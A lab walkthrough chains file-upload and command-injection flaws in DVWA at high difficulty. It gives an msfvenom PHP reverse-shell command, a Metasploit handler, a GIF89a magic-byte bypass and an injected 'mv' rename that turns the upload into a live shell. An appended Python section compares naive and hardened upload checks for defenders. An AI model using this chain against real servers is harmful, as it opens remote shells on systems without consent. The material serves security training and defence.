File Upload Walkthrough on DVWA, HIGH Difficulty
@mmar
Chain Multiple Vulnerabilities (File Upload + Command Injection)
Step 1
Go to DVWA security settings and set the difficulty to high
Step 2
Create an msfvenom payload on your Kali machine:
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > exploit.php
Step 3
Now run Metasploit and start a multi-handler to listen for PHP reverse sessions.
> use exploit/multi/handler
> set payload php/meterpreter/reverse_tcp
Step 4
Now upload the file. The file will not be uploaded. At Medium difficulty, the server checks the file's content type and, if it is not a JPEG image, does not upload it.
Step 5
At High difficulty, the server checks the file type as well. We can bypass this by placing an image file signature (magic bytes) at the top of the file itself. So, add GIF89a; at the top of your exploit file, rename it to exploit.php.jpeg, and upload it. The file will be uploaded.
Step 6
Now we need to exploit some other vulnerability to make the file work. If command injection is also available, use the following command to rename the file:
| mv "/usr/share/dvwa/hackable/uploads/exploit.php.jpeg" "/usr/share/dvwa/hackable/uploads/exploit.php"
Step 7
Now browse to the uploaded file. We will get the reverse shell.
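A defender's view of Steps 4 to 6, as an added example that is not part of the original slides or DVWA's code: `naive_check` models the kind of extension-plus-signature test that the GIF89a trick passes (an assumption about the server logic), and `strict_check` is one hardened alternative. All function names, the extension lists and the sample file are constructed for illustration.

```python
import os
import secrets

# Magic bytes per allowed extension (the form is meant to accept images only).
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
ANY_SIGNATURE = tuple(s for sigs in SIGNATURES.values() for s in sigs)
# Extensions a PHP-enabled server may pass to the interpreter.
SCRIPT_EXT = {"php", "php3", "php4", "php5", "phtml", "phar"}
PHP_TAGS = (b"<?php", b"<?=")  # heuristic content markers

# Constructed sample shaped like the Step 5 file; the body is an inert comment.
SAMPLE_NAME = "exploit.php.jpeg"
SAMPLE_DATA = b"GIF89a;\n<?php /* placeholder, not a payload */ ?>"


def naive_check(filename: str, data: bytes) -> bool:
    """Weak logic: last extension is allowed and the bytes start like *some* image."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in SIGNATURES and data.startswith(ANY_SIGNATURE)


def strict_check(filename: str, data: bytes):
    """Return (stored_name, problems); stored_name is None when rejected."""
    parts = os.path.basename(filename).lower().split(".")
    ext, problems = parts[-1], []
    if ext not in SIGNATURES:
        problems.append("extension not allowed")
    elif not data.startswith(SIGNATURES[ext]):
        problems.append("signature does not match extension")
    if SCRIPT_EXT.intersection(parts[1:-1]):
        problems.append("script extension hidden in name")
    if any(tag in data.lower() for tag in PHP_TAGS):
        problems.append("PHP open tag in content")
    if problems:
        return None, problems
    # Server-chosen name: nothing from the client's filename reaches disk.
    return f"{secrets.token_hex(16)}.{ext}", problems


if __name__ == "__main__":
    print("naive :", naive_check(SAMPLE_NAME, SAMPLE_DATA))
    print("strict:", strict_check(SAMPLE_NAME, SAMPLE_DATA))
```

The content scan is a heuristic; re-encoding the image and storing uploads outside the web root are stronger controls. The command injection used in Step 6 is a separate flaw and still needs its own fix.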
THANKS